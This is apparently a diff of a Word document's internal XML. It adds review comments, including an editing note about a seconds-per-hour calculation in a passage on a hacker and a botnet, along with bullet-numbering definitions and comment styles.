xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
+  <w:comment w:id="0" w:author="Thomas A. Gosman" w:date="2026-06-17T07:21:00Z" w:initials="TG">
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CommentText"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CommentReference"/>
+        </w:rPr>
+        <w:annotationRef/>
+      </w:r>
+      <w:r>
+        <w:t>Diagram Still Required, Summarised Post Required</w:t>
+      </w:r>
+    </w:p>
+  </w:comment>
+  <w:comment w:id="1" w:author="Thomas A. Gosman" w:date="2026-06-20T11:12:00Z" w:initials="TG">
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CommentText"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CommentReference"/>
+        </w:rPr>
+        <w:annotationRef/>
+      </w:r>
+      <w:r>
+        <w:t>Note from solo teenager hacker to large botnet they have forgotten the seconds per hour calculation and so a factor of 3600 needs to be used to recalculate</w:t>
+      </w:r>
+    </w:p>
+  </w:comment>
+</w:comments>
+</file>
+
+<file path=word/commentsExtended.xml><?xml version="1.0" encoding="utf-8"?>
+<w15:commentsEx xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
+  <w15:commentEx w15:paraId="021B784C" w15:done="0"/>
+  <w15:commentEx w15:paraId="1A27AC78" w15:done="0"/>
+</w15:commentsEx>
+</file>
+
+<file path=word/commentsExtensible.xml><?xml version="1.0" encoding="utf-8"?>
+<w16cex:commentsExtensible xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:cr="http://schemas.microsoft.com/office/comments/2020/reactions" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl cr w16du wp14">
+  <w16cex:commentExtensible w16cex:durableId="760BFA7A" w16cex:dateUtc="2026-06-16T21:21:00Z"/>
+  <w16cex:commentExtensible w16cex:durableId="5FA03D0A" w16cex:dateUtc="2026-06-20T01:12:00Z"/>
+</w16cex:commentsExtensible>
+</file>
+
+<file path=word/commentsIds.xml><?xml version="1.0" encoding="utf-8"?>
+<w16cid:commentsIds xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
+  <w16cid:commentId w16cid:paraId="021B784C" w16cid:durableId="760BFA7A"/>
+  <w16cid:commentId w16cid:paraId="1A27AC78" w16cid:durableId="5FA03D0A"/>
+</w16cid:commentsIds>
 </file>
 
 <file path=word/endnotes.xml><?xml version="1.0" encoding="utf-8"?>
@@ -853,6 +4277,118 @@
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
 <w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="06A9303D"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="EDD24D2E"/>
+    <w:lvl w:ilvl="0" w:tplc="DC32290A">
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="-"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Aptos" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Aptos" w:cstheme="minorBidi" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="0C090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0C090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0C090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="0C090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0C090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0C090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="0C090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0C090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="167B7B7B"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="16F28AC0"/>
@@ -938,7 +4474,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="4923DB14"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="58F04830"/>
@@ -1024,7 +4560,119 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="6C0B3BCB"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="66E27918"/>
+    <w:lvl w:ilvl="0" w:tplc="8092D73A">
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Symbol" w:cstheme="minorBidi" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="0C090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0C090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0C090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="0C090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0C090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0C090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="0C090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0C090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="757A9A20"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="B212E0C6"/>
@@ -1111,15 +4759,29 @@
     </w:lvl>
   </w:abstractNum>
   <w:num w:numId="1" w16cid:durableId="64576364">
+    <w:abstractNumId w:val="4"/>
+  </w:num>
+  <w:num w:numId="2" w16cid:durableId="548495595">
+    <w:abstractNumId w:val="1"/>
+  </w:num>
+  <w:num w:numId="3" w16cid:durableId="2077703631">
     <w:abstractNumId w:val="2"/>
   </w:num>
-  <w:num w:numId="2" w16cid:durableId="548495595">
+  <w:num w:numId="4" w16cid:durableId="1117984316">
+    <w:abstractNumId w:val="3"/>
+  </w:num>
+  <w:num w:numId="5" w16cid:durableId="1129320367">
     <w:abstractNumId w:val="0"/>
   </w:num>
-  <w:num w:numId="3" w16cid:durableId="2077703631">
-    <w:abstractNumId w:val="1"/>
-  </w:num>
 </w:numbering>
+</file>
+
+<file path=word/people.xml><?xml version="1.0" encoding="utf-8"?>
+<w15:people xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
+  <w15:person w15:author="Thomas A. Gosman">
+    <w15:presenceInfo w15:providerId="Windows Live" w15:userId="0c59b39ae9c4eef1"/>
+  </w15:person>
+</w15:people>
 </file>
 
 <file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
@@ -1589,7 +5251,6 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
-    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">
@@ -1709,6 +5370,107 @@
     <w:rPr>
       <w:color w:val="605E5C"/>
       <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="CommentReference">
+    <w:name w:val="annotation reference"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00903D82"/>
+    <w:rPr>
+      <w:sz w:val="16"/>
+      <w:szCs w:val="16"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="CommentText">
+    <w:name w:val="annotation text"/>
+    <w:basedOn w:val="Normal"/>
+    <w:link w:val="CommentTextChar"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00903D82"/>
+    <w:pPr>
+      <w:spacing w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:rPr>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="CommentTextChar">
+    <w:name w:val="Comment Text Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="CommentText"/>
+    <w:uiPriority w:val="99"/>
+    <w:rsid w:val="00903D82"/>
+    <w:rPr>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
+      <w:lang w:val="en-AU"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="CommentSubject">
+    <w:name w:val="annotation subject"/>
+    <w:basedOn w:val="CommentText"/>
+    <w:next w:val="CommentText"/>
+    <w:link w:val="CommentSubjectChar"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00903D82"/>
+    <w:rPr>
+      <w:b/>
